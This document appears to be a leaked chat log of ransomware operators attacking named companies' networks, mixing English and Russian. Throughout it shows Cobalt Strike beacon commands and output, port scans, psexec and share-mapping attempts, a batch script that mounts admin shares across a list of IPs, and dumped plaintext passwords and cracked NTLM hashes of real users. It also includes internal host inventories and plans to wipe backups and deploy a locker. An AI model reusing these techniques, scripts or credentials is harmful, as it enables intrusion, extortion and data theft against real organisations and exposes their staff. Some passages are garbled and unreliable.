not quite
get it?
it's when we push to ALL servers a batch that opens ALL shares to EVERYONE
which raises coverage a hell of a lot, and speed
by the way, there's another cool thing
yes, let's try
to raise the percentage of "area" covered on the network;)
turn on all PCs in the network beforehand
Wake On Lan
nah, that's for @tl2
what's WOL?
is that a question for us?
by the way, are we going to hit this network with WOL?
they're coming out into the light, yeah
god, they're multiplying, run
well, after the ping via SharpSharesNG there are more of them)
a prank with servers
it's a prank)
71 servers out of 53 alive?)
how's that?
```
53 servers (71 alive)
```
```
WEB4: 89.0.0.158
WEB4: 89.0.0.157
WEB4: 89.0.0.156
WEB4: 89.0.0.155
WEB4: 89.0.0.154
WEB4: 89.0.0.153
WEB4: 89.0.0.152
WEB4: 89.0.0.151
WEB4: 89.0.0.150
WEB4: 89.0.0.66
WEB4: 65.162.42.254
WEB4: 65.162.42.252
WEB4: 65.162.42.251
WEB4: 65.162.42.250
WEB4: 65.162.42.242
WEB4: 65.162.42.197
```
```
winona.rtpco.local
118 machines per AD
64 workstations on Windows (10 alive)
53 servers (71 alive)
```
I'll re-ping everything now
what do we have here before close of day?
*and
we dropped it
everyone forgot about it
@tl2 looks like it's a relic
here
the one above
that's a different one
nooo
`RichmondDC2.us.alloypolymers.com`
```
beacon> shell dnscmd us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd us.alloypolymers.com /info
[+] host called home, sent: 64 bytes
[+] received output:
Query result:
Server info
  server name              = RichmondDC2.us.alloypolymers.com
  version                  = 25800306 (6.3 build 9600)
  DS container             = cn=MicrosoftDNS,cn=System,DC=us,DC=alloypolymers,DC=com
  forest name              = us.alloypolymers.com
  domain name              = us.alloypolymers.com
  builtin forest partition = ForestDnsZones.us.alloypolymers.com
  builtin domain partition = DomainDnsZones.us.alloypolymers.com
  read only DC             = 0
  last scavenge cycle      = not since restart (0)
Configuration:
  dwLogLevel               = 000000
  dwDebugLevel             = 00000000
  dwRpcProtocol            = 00000005
  dwNameCheckFlag          = 00000002
  cAddressAnswerLimit      = 0
  dwRecursionRetry         = 3
  dwRecursionTimeout       = 8
  dwDsPollingInterval      = 180
Configuration Flags:
  fBootMethod              = 3
  fAdminConfigured         = 1
  fAllowUpdate             = 1
  fDsAvailable             = 1
  fAutoReverseZones        = 1
  fAutoCacheUpdate         = 0
  fSlave                   = 0
  fNoRecursion             = 0
  fRoundRobin              = 1
  fStrictFileParsing       = 0
  fLooseWildcarding        = 0
  fBindSecondaries         = 0
  fWriteAuthorityNs        = 0
  fLocalNetPriority        = 1
Aging Configuration:
  ScavengingInterval       = 0
  DefaultAgingState        = 1
  DefaultRefreshInterval   = 168
  DefaultNoRefreshInterval = 168
ServerAddresses:
  Ptr                      = 00000057578A8210
  MaxCount                 = 2
  AddrCount                = 2
  Addr[0] => af=23, salen=28, [sub=0, flag=000000] p=13568, addr=fe80::1ea:20ef:8dbe:2e0
  Addr[1] => af=2, hall=16, [sub=0, flag=000000] p=13568, addr=10.1.247
ListenAddresses:
  NULL IP Array.
Forwarders:
  Ptr                      = 00000057578A8C40
  MaxCount                 = 4
  AddrCount                = 4
  Addr[0] => af=2, salen=16, [sub=0, flag=000000] p=13568, addr=64.83.1.10
  Addr[1] => af=2, hall=16, [sub=0, flag=000000] p=13568, addr=64.83.0.10
  Addr[2] => af=2, salen=16, [sub=0, flag=000000] p=13568, addr=209.218.44.2
  Addr[3] => af=2, hall=16, [sub=0, flag=00000000] p=13568, addr=209.125.133.6
  forward timeout          = 3
  slave                    = 0
Command completed successfully.
```
```
beacon> shell dnscmd gaproc.us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd gaproc.us.alloypolymers.com /info
[+] host called home, sent: 71 bytes
[+] received output:
Info query failed
    status = 1722 (0x000006ba)
Command failed:  RPC_S_SERVER_UNAVAILABLE     1722  0x6BA
```
maybe he means dnscmd?
maybe I was the one poking at it?
re-captured seabel
```
Entry : gaproc.us.alloypolymers.com
Name  : gaproc.us.alloypolymers.com
Data  : 192.168.1.121
Entry : gaproc
Name  : gaproc.us.alloypolymers.com
Data  : 192.168.1.121
```
it's not in the domain controllers' DNS records either
if so, we skip it
I think yes
if there's no other way to check, then we skip it
nothing visible there somehow
it's not in AD
maybe it really is a relic
```
Teemo[WINDC2]SYSTEM */4284|20Dec25 01:04:37> portscan 192.168.3.0/24 1-10000
[*] Tasked beacon to scan ports 1-10000 on 192.168.3.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```
let's leave it like that
yep
```
Teemo[WINDC2]SYSTEM */4284|20Dec25 00:57:22> remote-exec psexec 89.0.10.104 tasklist
[*] Tasked beacon to run 'tasklist' on 89.0.10.104 via Service Control Manager
[+] host called home, sent: 1998 bytes
[-]
```
Could not open service control manager on 89.0.10.104: 1728 ``лишний раз шуметь не будемдоступы естьтам вроде бэкапы видныхотя хер с нима псек`` Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:56:06> shell tasklist /v /s 89.0.10.104 [Tasked beacon to run: tasklist /v /s 89.0.10.104 [+] host called home, sent: 57 bytes [+] received output: ERROR: The RPC server is unavailable. ``сделайте сюда тоже скан на /24`` --- Chromium Credential (User: dch) --- URL : http://192.168.3.254:5000/webman/login.cgi Username : admin Password : 11Dennis ``` такая хрень попадалась в браузере, через проксу пробовал зайти вообще не грузити еще @user7 а проверь нас tasklist /v /sпробегитесь по нимданые же выкачивали?нет, я уделял особое внимание линкам с доманом и ipвстречали туда пути?ребят, всю инфу что выгружали с тачек технареймне так же кажетсяблядство может он ваще рудиментарный какой-то пережиток прошлых веков`` [*] Tasked beacon to scan ports 135,139,445,80,443,8080,1433 on 192.168.1.0/24 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete ```да давайте запортсканиможет пинг фильтроваться...и внц еще укажите + рдпна 135,139,445, веб порты и скульСо всехпроверьте /24`` Teemo[WINDC2]SYSTEM */4284|20Dec24 21:36:28> shell ping gaproc.us.alloypolymers.com -n 1 [*] Tasked beacon to run: ping gaproc.us.alloypolymers.com -n 1 [+] host called home, sent: 68 bytes [+] received output: Pinging gaproc.us.alloypolymers.com [192.168.1.121] with 32 bytes of data: Request timed out. Ping statistics for 192.168.1.121: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), ```а ты его с US пинговал?кхмотсканьте диапНе пингуеться(лол)) ну серьезно, где ты его заметил?ипак локального диапазона?Карты ТАРО указали путь)))он пингуется? 
диап отсканирован куда он пингуется?а откуда по нему инфа?Его нет в трастах вообщевроде не в АДон в карантине?Есть еще траст к которому нет доступану вцелом поебатьхм занятноЭто нет гир на линухенасколько я понимаю это НАС на урезанной винде?файлы свежиеШкола Сни северного)красавчикишикарно ребят)ну вот и славнолокер пройдется по нейЗапись естьесли работает - все отличнопроверьте запись в эту дирудайте скрин или листинг диры с размерами файловНе всегда на них диски расшарены, там в настройках можно просто выбрать папку для того что б от куда нужно клать бекапыминутучитаюя тутгуру приди@tl2призываем гуру @tl2там должны быть диски расшареныа хотя мб рано радуемсячестно сам удивлен)скасибо что сказал посмотреть, так бы ещё неделю бы ебались с ней )@tl2 посмотри на этоскорее всего у нее был доступтокен чей?под какой учеткой замапили?ну вы даетет е у вас все это время был доступ?хотя доступ и так былбля)в том то и дело что никак не сделали, ты сам сказал посмотреть нет вив а до этого момента мы искали креды от веб мордыкак?)вы сделали это?``` Teemo[WINDC2]SYSTEM */4284|20Dec25 00:32:40> shell net use * \\89.0.10.104\Documents [Tasked beacon to run: net use * \\89.0.10.104\Documents [+] host called home, sent: 64 bytes [+] received output: Drive Z: is now connected to \\89.0.10.104\Documents. The command completed successfully. Teemo[WINDC2]SYSTEM */4284|20Dec25 00:32:53> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK Z: \89.0.10.104\Documents Microsoft Windows Network The command completed successfully. ``Do you have access to the balloon view? 
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:29:28> shell net view \89.0.10.104 /all [*] Tasked beacon to run: net view \\89.0.10.104 /all [+] host called home, sent: 58 bytes [+] received output: Shared resources at \89.0.10.104 nas-D5-E2-B8 Share name Type Used as Comment ------------------------------------------------------------------------------- Documents Disk Document folder IPC$ IPC IPC Service ("nas-D5-E2-B8") Music Disk Music folder Pictures Disk Picture folder Videos Disk Video folder The command completed successfully. ``no viv nasa or what ?``and give net view \\hosdt /all can't find anything related to nasomnu how are you doing ?``I found another trust ``gaproc.us.alloypolymers.com`` but it is not availablesolidlydethey so successfully all on kmd5 passed ? fc525c9683e8fe067095ba2ddc971889 Passw0rd! 7facdc498ed1680c4fd1448319a8c04f Password1! 876c802a60e4623dae480bf75d215bbc 11dchamh 083c3829383f6ce4bd61ee1135fa14cf qcqcqc1 ``Check the @tl1`` Credits winona.rtpco.local Administrator c5cd921bd3aaaad70c0ee9e14bfe096c dch 876c802a60e4623dae480bf75d215bbc DEPCON 083c3829383f6ce4bd61ee1135fa14cf `````` rtpco.local Administrator 544599e93b8ab30d2a53ec48ce7ca6da arobinsona fc525c9683e8fe067095ba2ddc971889 (Installed by many users) cancelet 8669993c0b6f8d65cd206a0c9e1d598b kaseyaservice d4e06b1ecf49e3d7932fba37fc6e96d5 O365Service 7facdc498ed1680c4fd1448319a8c04f sagert 86517550f7c701dbb1f28f23a39fad9b spicescan ca1484e694d5ca64dd6b59e3510d7f73 ``good night'' 7259ade8efc785abb4043e171e06b9c6 300SpartanS 88781646e2a2399370c54bae7f790e58 @d0nix b4712f346339be917d4d9fe2ce3c387c barracuda 5acd3ae4a25e042cb01513ea9104b598 Barracuda f97f8542534b19414d871e197d222747 Gutch@!! 
960736ab56cfa8943d4de07ef142a730 boston ae8e27dc85a2682037008ebe671655f0 afdljplw b6c367027c0d73a755244ad52bda9a67 !nC0rr3ct 6c77565149af62e68bb41868d29ec47a d0n3g0n3 e9b57eb8af25befb91bda9b4ed95097c 11Saundra a99a74eb78fc1f1ea3a89b53b7de7179 p@perm00n b4712f346339be917d4d9fe2ce3c387c barracuda 26e7f39a25b859023e876293c37495e3 D33pw@ter 4df7f5cc8377559b058c30516ca88a30 sub@sh2005 06ee9928c5ebc952e0fc44e300ff821f c]st0m3r 5f6e5864d8622c481a233d9472f1b3a8 Gahann@ 652805d304727fa73d6c4c7cfef31986 Calib3r9 ``Till tomorrow''. Administrator 66ac9a770e02cfdded6d5bd957a774fb Angel 7259ade8efc785abb4043e171e06b9c6 adonixadmin 88781646e2a2399370c54bae7f790e58 alloyamms ab6be57f8c4cc213e70158f87953f45a barracuda b4712f346339be917d4d9fe2ce3c387c BarracudaBUP 5acd3ae4a25e042cb01513ea9104b598 bbuerck f97f8542534b19414d871e197d222747 BGW 960736ab56cfa8943d4de07ef142a730 CAncelet ae8e27dc85a2682037008ebe671655f0 canceleta b6c367027c0d73a755244ad52bda9a67 cevansa 6c77565149af62e68bb41868d29ec47a citrix_svc 66ac9a770e02cfdded6d5bd957a774fb DHaase e9b57eb8af25befb91bda9b4ed95097c EntAdmin a99a74eb78fc1f1ea3a89b53b7de7179 gahbarracuda b4712f346339be917d4d9fe2ce3c387c orgbarracuda 26e7f39a25b859023e876293c37495e3 sagert 86517550f7c701dbb1f28f23a39fad9b Services_Backup 4df7f5cc8377559b058c30516ca88a30 Uptime 06ee9928c5ebc952e0fc44e300ff821f veeam 5f6e5864d8622c481a233d9472f1b3a8 wstangea 652805d304727fa73d6c4c7cfef31986 The ``dropsession files in slipk 6okay then on tomorrow roll there logins(mail), with clears what is there([ ](https://mediaeveryone.com/group/rtpcompany-com?msg=eypQF6sQrBzHzsJKD) mail sootv from hell, or login accountswith @tl1 when we worked at ART for a long time, probably a good half of critical accesses from e-mails that were not on machines there and network diagrams and instructions on connections and keys and passwords e-mail is a treasure of information in many companies, he had to go under a proxy on the ADR to be routed to mycr and authorize there, and very 
often he flies through the mail to the microsoft site. Do you think he who passed the data on the posta here? there either the pass does not fit, or not created a box, or an empty mail, not a word about us and the ip and the hostname? in the mail all the clerks checked - empty you scan on subdomains `` `` Subdomain IP address OS Server Technology Web Platform Page Title autodiscover.rtpcompany.com 52.97.170.40 Sign in to Outlook sip.rtpcompany.com 52.112.65.203 RTC 7.0 dns2.rtpcompany.com 63.219.151.12 vpn2.rtpcompany.com 64.213.220.250 ssl.rtpcompany.com 65.162.42.135 vpn.rtpcompany.com 65.162.42.173 wiki.rtpcompany.com 65.162.42.180 mail.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login mailhost.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login pop3.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login smtp.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login ts.rtpcompany.com 65.162.42.198 exchange.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook search.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook webmail.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook docs.rtpcompany.com 65.162.42.206 Windows Microsoft-IIS 7.5 ASP.NET IIS7 citrix.rtpcompany.com 65.162.42.222 Windows Microsoft-IIS 7.5 ASP.NET web1.rtpcompany.com 65.162.42.241 beta.rtpcompany.com 65.162.42.241 asia.rtpcompany.com 65.162.42.246 dns4.rtpcompany.com 65.162.42.249 rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company web.rtpcompany.com 65.162.42.250 ftp.rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company home.rtpcompany.com 65.162.42.251 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 public.rtpcompany.com 65.162.42.252 Windows Microsoft-IIS 7.5 ASP.NET public.rtpcompany.com www.rtpcompany.com 167.71.108.192 
PHP WordPress 5.6 RTP Company fr.rtpcompany.com 204.248.115.14 es.rtpcompany.com 204.248.115.14 dns.rtpcompany.com 205.243.114.218 dns3.rtpcompany.com 208.94.147.135 data.rtpcompany.com 216.252.195.128 Windows Microsoft-IIS 7.5 ASP.NET 2.0.50727 Advanced Materials Search by Property, Composition, or Text ``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=nA3hZ2RS3fYvk3hP9) I'm just afraid to use it, after the obvious errors of other tools) throw the hashes of all YES quickly run them through kmd5sobot kredes domain https://webmail.rtpcompany.com/owa/auth/logon.aspx ``alternative https://exchange.rtpcompany.com/owa/auth/logon.aspx ``above mistake once disassemble the tool and we will be happy with the search of all mail@tl1 please, with mailsnapper dig `mail.rtpcompany.com ``rtpcompany.comThe computers that I came across offnut, I ngdeto seen a link to the domain mail, it must be found. After that, I'll try to connectwhy not get a quick look now a quick look not to get into tomorrow during office hours did not look therepasswordpochtu? I think so yes it first did just in case)but google default root pass to port 22 for ReadyNAS hardly anyone goes there at all on ssh just bros, this is not a full-fledged lin it's a nixlike system for haaS if there's only lin backups then just shred the server into zeros and fuck it delete lin don't get lost ``` Why can't i break it? just open the smb balloon and break it as you please. go through all available usernames, passwords + all vulnerabilities from the msf - no point in moving it to tomorrow? to try to find the data i need to check every arm and servicecloud. That's a long time. 
89.0.1.6:445 (platform: 500 version: 5.0 name: MAINT domain: WORKGROUP) http://89.0.1.6/rtp/index.cfm `````` Teemo[23L1]TOM/3608|2020Dec24 06:00:28> shell nslookup 89.0.10.104 [*] Tasked beacon to run: nslookup 89.0.10.104 [+] host called home, sent: 51 bytes [+] received output: Server: mndc2.rtpco.local Address: 89.0.0.83 Name: nas-D5-E2-B8.rtpco.local Address: 89.0.10.104 `````` URL : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx Username : tom Password : Passw0rd! ``Isn't the ip or hostname glowing in the admins' browsers? [+] received output: 89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1) Did you look for access? No, not in any domain ad users do not have geodunase if there is no files on the pc, maybe they did a search on NASnet/ And read the mail of admins?) Guys, we will search for a long time))) Give me a screenshot of the web admin WINONA\TOM abcabc4 RTPCO\corr 00sthomas RTPCO\pvcimpro 4qbuyh RTPCO\rmiller 789)_+rm RTPCO\dpflughoeft BabyYoda123 rtpco\administrator d0T73Rd! WINONA\Administrator DA7PaM8h DEPCONSG/administrator dropC AXREMOTESRV\Administrator dropCod5 RTPCO\npaine Jsnp&524 WINONA\rmiller michael1 WINONA Color Plastics1 rtpco\bkouba PrayersNeeded2020! RTPCO\lmiller Ronnie11 ``Not wind? beacon> portscan 89.0.10.104 1-10000 icmp 200 [*] Tasked beacon to scan ports 1-10000 on 89.0.10.104 [+] host called home, sent: 75365 bytes [+] received output: (ICMP) Target '89.0.10.104' is alive. 
[read 8 bytes] 89.0.10.104:10000 [+] received output: 89.0.10.104:8200 [+] received output: 89.0.10.104:5355 [+] received output: 89.0.10.104:3702 [+] received output: 89.0.10.104:443 [+] received output: 89.0.10.104:139 89.0.10.104:80 [+] received output: 89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1) [+] received output: 89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP) Scanner module is complete Portscan in progressDefault combinations do not fitNow give portscanYou guys do not read the messages When do we start pulling? What will pull the servers to divide among themselves You decide what to do there?[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=abZxmjF9E8zPF4rJL) and this[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=rWw6TTnNd5ZKh7yGQ) took this [ ] (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP) didn't come up YES LA as local admins ``` no access to folders on the NAS or did you try to authorize? no on the PC admins watched the rg files? re-checked all the Administrator did not fit YES LA as local admins and check the webcards YES / default for this NASa if no access - then log on 80/443 try to strange question))) lock it need)) access that is it? LA or DA some? @tl2 what do we do with us? 1) We are not broken into groups of servers 2) We're in the vorgsteins. 
us.alloypolymers.com SERVER ALLOYLICWEB: 10.1.1.238 ALLOYAPP3: 10.1.1.250 RICHMONDDC1: 10.1.1.248 RICHMONDDC2: 10.1.1.247 ALLOYAMMS: 10.1.1.231 GAH2K3SRV1: 10.1.10.40 GAHDC2: 10.1.10.81 ALLOYCRKT01: 10.1.5.250 CROCKETTDC1: 10.1.5.241 ALLOYORGAPP01: 10.1.8.11 ALLOYEXCH02: 10.1.1.240 ORANGEDC1: 10.1.8.248 ALLOYSQL01: 10.1.1.243 ALLOYXENAPP: 10.1.1.237 ALLOYAPP01: 10.1.1.251 RICHMONDSTORAGE: 10.1.1.245 OHPRINTSRV: 10.1.10.12 OHSPICEWORKS: 10.1.10.11 CROCKETTSTORAGE: 10.1.5.242 ALLOYWEB2: 10.1.8.210 GAHDC01: 10.1.10.82 ORANGESTORAGE: 10.1.8.245 ORGPRINTSRV: 10.1.8.246 CTXALLOYCONNECT: 10.1.1.221 ``Just one more time, the avs have decided to bypass the inject all ready? rtpco.local SERV AXBATCH-TEST: 10.89.11.112 WINONAV1: 10.89.11.22 AXAOS-BUILD: 10.89.11.120 SAN-HQ: 10.89.11.35 AXDEV3: 10.89.11.103 AXDEV6: 10.89.11.106 MINITABLIC: 10.89.11.6 AXDEV1: 10.89.11.101 AXDEV2: 10.89.11.102 AXSQL-DEV: 10.89.11.118 TX-TESTSRV1: 10.58.0.166 MXSTORAGE: 10.13.0.14 SHENZDC1: 10.17.1.5 NVSTORAGE: 10.57.0.36 NEVADAHYPV1: 10.57.0.84 NVDC1: 10.57.0.32 SUZHOUDC2: 10.7.0.41 SUZHOUPRINTSRV: 10.7.0.21 SINGDC1: 10.5.0.4 SINGDC2: 10.5.0.5 SINGSTORAGE: 10.5.0.19 MNDC2: 89.0.0.81 ``Yes, Captain''. rtpco.local SERV. CTXCONNECTOR2: 10.89.11.27 CTXCONNECTOR1: 10.89.11.26 SQLPROD1: 10.89.0.99 KASEYA: 10.89.11.24 CTXAPP3: 10.89.11.28 ONBASEPROD1: 10.89.11.7 ONBASETEST: 10.89.11.10 CTXAPP4: 10.89.11.11 ONBASETEST01: 10.89.11.33 WEBPROD01: 10.89.11.31 PDM01: 10.89.11.32 SOLARWINDS: 10.89.11.2 WINPAK01: 10.89.0.111 MAINTENANCE: 10.89.11.40 MNDC2: 89.0.0.83 STORAGEWINONA2: 10.89.11.14 AXFORMS-DEV: 10.89.11.111 EXCHANGE: 10.89.11.10 ADMT: 10.89.11.5 INDYDC1: 10.59.0.4 AXREPORTS-DEV: 10.89.11.121 AXAOS-TRAINING: 10.89.11.122 AXAOS-TEST: 10.89.11.123 ``are you ready? 
rtpco.local SERV FRANCEDC1: 10.4.0.25 FRANCEDC2: 10.4.0.26 FRANCESTORAGE: 10.4.0.27 FRANCEPRINTSRV: 10.4.0.28 GERMANYDC1: 10.20.0.40 GERMANYDC2: 10.20.0.41 GERMANYSTORAGE: 10.20.0.42 FR-VIR2008-02: 10.4.0.19 FRANCESAGE: 10.4.0.100 FRANCEINTERMEC: 10.4.0.72 FRANCEARCHIVE: 10.4.0.10 DC1POLAND: 10.28.0.5 POLSTORAGE: 10.28.0.8 DC2POLAND: 10.28.0.6 MNDOMAIN6: 10.89.0.20 PV-PROD2: 10.89.0.87 PV-PROD1: 10.89.0.86 SNAP: 10.89.10.12 RTPADFS1: 89.0.0.191 VADC1: 10.56.0.30 VADC2: 10.56.0.31 CHILLER2: 10.89.10.11 VADC2: 10.56.0.35 `````` rtpco.local 25L27A: 89.0.191.55 30L107: 89.0.191.64 25L21: 172.22.200.26 BBDESK2: 89.0.192.80 26L19: 10.58.0.132 ADAM-DESKTOP: 89.0.192.87 23LL76: 89.0.192.189 UPS580: 89.0.191.216 24L11: 10.58.0.135 33LL67: 89.0.192.215 30L43: 89.0.192.45 28L4A: 89.0.192.6 27L24: 10.32.0.191 CNSZCYDGG13: 10.7.3.13 NB02B_RTPSZ: 10.17.4.40 CNSZD6RTNY02: 10.7.2.76 30L07: 89.0.191.137 TIS-RTP: 10.7.2.81 25L59: 89.0.191.46 26L47: 10.25.0.130 25L9: 89.0.191.43 25L42: 89.0.193.15 26L251: 10.32.1.188 30LL56: 89.0.191.172 32LL58: 10.58.58.91 CNSZD2M6RC3X: 10.7.2.106 DEPCON10B: 89.0.192.150 DEPCON10SG: 10.5.1.21 SG20160916-PC: 10.5.1.75 SG20190107-PC: 10.5.1.103 SUZHOU-JOLYN: 10.7.2.151 SG20140923-NB1: 10.5.1.131 30L30: 10.1.8.145 MXL5040QYD-1: 10.1.8.220 PRTMONITOR: 10.89.11.36 29LL22: 172.22.245.162 28LL50: 10.13.0.87 DEPCON10FR: 89.0.192.141 DENNIS15: 89.0.88.20 25L37: 89.0.192.47 DENNIS10: 10.33.255.253 31LL31: 89.0.203.201 30L24A: 10.1.5.208 26L14: 10.33.1.246 31LL35: 172.22.245.170 27L07: 89.0.191.57 27L09: 89.0.193.118 QATHERMAL: 89.0.191.80 CNSZN84WP433: 10.7.2.163 SG20171218-NB: 10.5.1.56 `````` rtpco.local SG20170531-NB: 10.5.1.99 W10-FR2018-CYC: 10.4.1.13 30L75: 89.0.192.98 30L36: 10.1.8.143 26L48: 89.0.192.81 LUNCHROOM2: 89.0.6.100 28L18: 10.57.0.61 24L19: 172.22.200.18 BSDESKTOP: 89.0.10.101 23LL7: 10.12.1.7 31LL08: 172.22.200.48 USH832L0DT: 10.1.8.128 30L40: 89.0.191.147 RTP-FGY: 10.7.2.58 W10-F2014-PYBA: 10.4.1.103 29LL36: 172.22.245.170 SG20180424-PC: 
10.5.1.53 26L7: 89.0.192.3 25L5: 172.22.200.62 CNSZ6K9ZJ13: 10.7.3.20 30L29: 10.1.8.157 27L28: 172.22.200.11 30L41: 89.0.191.245 25L3: 89.0.192.77 18L15: 172.22.200.11 27L06: 89.0.192.160 30L94: 10.59.0.156 30L14: 10.36.5.236 AVANITEN: 10.89.11.34 31LL42HR: 89.0.191.209 31LL19: 89.0.192.102 27L12: 10.56.0.166 26L05: 172.22.200.24 31LL36: 172.22.245.162 28L24: 10.57.0.85 28LL75: 172.22.200.29 30L54: 89.0.191.174 24L20: 172.22.245.137 RTP_SZ_ZPH: 10.17.4.14 SG2010018: 10.5.1.105 WIN7-2016-CHG: 10.28.0.100 28LL56: 89.0.192.215 30L47: 10.59.0.113 30L22: 10.1.5.151 AXUPS: 10.89.11.35 30L93: 10.59.0.106 26L59: 89.0.193.94 25L43: 172.22.200.66 30L10: 89.0.193.76 `````` rtpco.local 24L5: 10.33.2.239 30L96: 89.0.191.196 26L23: 10.58.0.156 30L65: 10.1.10.146 26L55: 10.56.0.118 SUZHOU-JANE: 10.7.2.136 28L19: 89.0.191.215 25L38: 89.0.192.172 30LL17: 89.0.203.201 22LL11: 10.33.1.254 32LL15: 89.0.203.204 26L29: 10.59.0.107 RTP_SZ_C1: 10.17.4.4 28L13: 10.57.0.63 30L59: 172.22.200.30 CNSZ6K0WJ13: 10.7.2.158 30L19: 89.0.192.127 27L14: 89.0.192.118 EQL-SAN2: 10.89.5.120 30L03: 10.36.6.234 30L51: 10.56.0.126 25L12: 89.0.193.67 METROMTRREADER: 89.0.191.183 29LL59: 89.0.203.201 30L21: 10.1.5.205 30L15: 172.22.200.16 29LL9: 10.1.8.104 30L100: 89.0.192.80 32LL62: 89.0.192.244 30L69: 89.0.192.35 VC1: 172.22.254.20 30L68: 89.0.191.58 30L98: 10.59.0.148 30L98: 10.59.0.148 30L92: 10.59.0.148 30L92: 10.89.11.3 32LL42: 89.0.192.239 CANCELET: 10.89.11.22 30LL29: 89.0.192.177 28L10: 89.0.191.39 23LL36: 172.22.200.48 26L07: 10.12.1.3 9.0.193.38 31LL40: 172.22.245.162 30L08: 10.58.0.154 32LL01: 89.0.203.201 30L85: 89.0.192.92 25L60: 89.0.193.101 26L56: 10.56.0.103 31LL22: 10.59.0.167 LTSIMBA1: 10.7.2.70 `````` rtpco.local WININTERMEC32: 89.0.192.202 30L60: 89.0.192.78 30L44: 89.0.191.148 DCHDESKTOP: 89.0.88.18 ONBASESCAN: 10.89.11.23 GUARDSHAK: 89.0.191.99 30LL27: 10.8.1.240 DEPCON10DV: 89.0.192.142 26L15: 10.13.0.92 30L26: 10.1.5.203 28LL95: 172.22.245.137 RTP_SZ-PC1: 10.17.4.5 RTP_SZ_C: 
10.17.4.22 28LL37: 172.22.245.162 W10-F2018-VIB: 10.4.1.46 ORION24: 89.0.191.71 28L16: 89.0.192.60 22L10INDY: 10.89.11.34 30L09: 10.32.1.231 26LL27: 172.22.200.11 30L102: 10.59.0.120 29LL32: 10.25.0.136 29LL57: 89.0.203.201 31LL45: 10.36.5.247 SUZHOU-ZOUWEI: 89.0.203.204 us.alloypolymers.com USH313A07T: 10.1.5.81 MXL5040SMP: 10.1.5.38 5CG4503TXM: 10.1.5.46 GAHDC570005: 10.1.10.99 5CG5050LDQ: 10.1.10.155 MXL5040SMP-CRT: 10.1.5.43 SPICEWORKSRCH: 10.1.1.124 ALLOYHD01: 10.1.1.124 GAHHP2UA2450T7H: 10.1.10.184 2UA5032HTR: 10.1.10.120 25L51: 10.1.10.220 MXL5040QXR: 10.1.8.83 GAHELECT: 10.1.10.190 GAHWIN7HP6000: 10.1.10.226 5CG5050FL1: 10.1.8.129 U8H835L061: 10.1.8.58 25L63: 10.1.10.244 XNVR-1739997: 10.1.10.180 ORGREMOTEPW: 10.1.8.151 MXL5040QYR: 10.1.8.175 USH0360062: 10.1.10.167 26LL34: 10.1.10.196 USH539L1C1: 172.22.245.170 GAHPROD1: 10.1.10.122 LEASE25-PC: 10.1.10.185 26LL31: 10.1.10.145 ``Checkbomb add /persist? If both show up, then cool add 2 hosts to this ipsa)`` @echo off for /f %%i in (ips.txt) do ( net use * \\%%i\C$ /persistent:yes ) ``` will it do that? or off with a batko kakim through the memory can take 100 servers per kobytes which kinda does not interfere in the case of 2fa on avmomo not yet pingingada now pinging all domains? total 200 servers? dunno how much interference, I generally quietly walk on their network how much interference? hmm, not a chance to bypass the inmemt in the cloud what is the administrator's browser? 2faSphere is`winona\tom,abcabc4`setg Proxies socks4:104.243.44.69:16219setg Proxies socks4:104.243.44.69:424181 2. kaseya 3. 
wargroups Name : Barracuda Orange Backup Server URL : http://10.1.8.14/auth/signin/ Name : Barracuda Crockett Backup Server URL : http://10.1.5.44/auth/signin/ Name : Barracuda Crockett Backup Server URL : http://10.1.5.34/auth/signin/ Name : Barracuda Backup RCH URL : http://10.1.1.14/auth/signin/ Name : ORG Barracuda Networks Login URL : http://10.1.8.232/web/login?_bcsp=1&_bceq=U2FsdGVkX1_ZQKJqbA-A6J1pDS0v348lRBF4gQRaT1Oos5iW-joM_MbMEGYcdA1LafroouYOUK8fDhjDdsOT4mCUAGvUboqz-KCiF9iyFEw. Name : CRT Barracuda Networks Login URL : http://10.1.5.180/web/login?_bcsp=1&_bceq=U2FsdGVkX1-zFQuAcSM8y3KXKFNCE-epeWxGww7gw37-3-IbBQlsFBC_6dk77rKf2OplTxoJjBY2xSAtaA0JEgq7yd9tbiBEUiNt-wZbBYo. ``Antivirus. Bekapyotnichat then write a list of current problems104.243.44.69:42418there's a splinter it kaseya.rtpcompany.com ``there's definitely kasper? There are some problems with kasper, is the rdp port open? The last problem? ``89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)` on us it is not possible to get to us, it's too early to close so then everything is ready to close if the cresses rolled into the sphere? the first time there? all do proxy) `https://172.22.254.20/` yes, but the stupidity of the face opened it means you came? + without /websso.... at the root, what already 